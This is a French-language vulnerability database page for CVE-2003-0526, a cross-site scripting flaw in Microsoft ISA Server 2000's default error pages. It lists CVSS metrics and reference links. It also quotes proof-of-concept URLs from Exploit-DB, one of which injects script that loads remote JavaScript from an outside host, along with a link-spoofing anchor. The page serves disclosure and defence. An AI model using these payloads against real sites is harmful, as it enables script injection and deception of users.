CVE-2003-0526 : Détail

CVE-2003-0526

2.4%V3
Network
2003-07-17
02h00 +00:00
2018-10-12
17h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Cross-site scripting (XSS) vulnerability in Microsoft Internet Security and Acceleration (ISA) Server 2000 allows remote attackers to inject arbitrary web script via a URL containing the script in the domain name portion, which is not properly cleansed in the default error pages (1) 500.htm for "500 Internal Server error" or (2) 404.htm for "404 Not Found."

Informations du CVE

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 6.8 AV:N/AC:M/Au:N/C:P/I:P/A:P nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 22919

Date de publication : 2003-07-15 22h00 +00:00
Auteur : Brett Moore
EDB Vérifié : Yes

source: https://www.securityfocus.com/bid/8207/info ISA server will output certain error pages when requests that are invalid, for whatever reason, are transmitted through it. These error pages will appear in the context of the domain that the request was made for. It has been reported that many of these error pages contain cross-site scripting vulnerabilities that allow for the execution of script code (embedded in the request URI) in the context of client requested domains. The following proof-of-concept was provided: http://<img%09src=""%09onerror="document.scripts[0].src=%27http%5Cx3a%5Cx2f%5Cx2fjscript.dk%5Cx2ftest.js%27;">script@YOUR.TLD/%U0 The above proof-of-concept will include and execute http://jscript.dk/test.js on YOUR.TLD, this is provided that YOUR.TLD is protected by an ISA Server installation. *http://<iframe>:test@[site]/test The exploit provided for BID 4486 will also reportedly work for this vulnerability. An additional proof-of-concept was supplied by "http-equiv@excite.com" <1@malware.com> that demonstrates a true status and a false destination: <A href="http://www.example.com%09%09%09@%09%09%09%09%09%09 09www.malware.com">http://www.example.com</A>

Products Mentioned

Configuraton 0

Microsoft>>Isa_server >> Version 2000

Microsoft>>Isa_server >> Version 2000

Microsoft>>Isa_server >> Version 2000

Références

http://marc.info/?l=ntbugtraq&m=105838590030409&w=2
Tags : mailing-list, x_refsource_NTBUGTRAQ
http://marc.info/?l=bugtraq&m=105838862201266&w=2
Tags : mailing-list, x_refsource_BUGTRAQ
http://marc.info/?l=bugtraq&m=105838519729525&w=2
Tags : mailing-list, x_refsource_BUGTRAQ
http://pivx.com/larholm/adv/TL006
Tags : x_refsource_MISC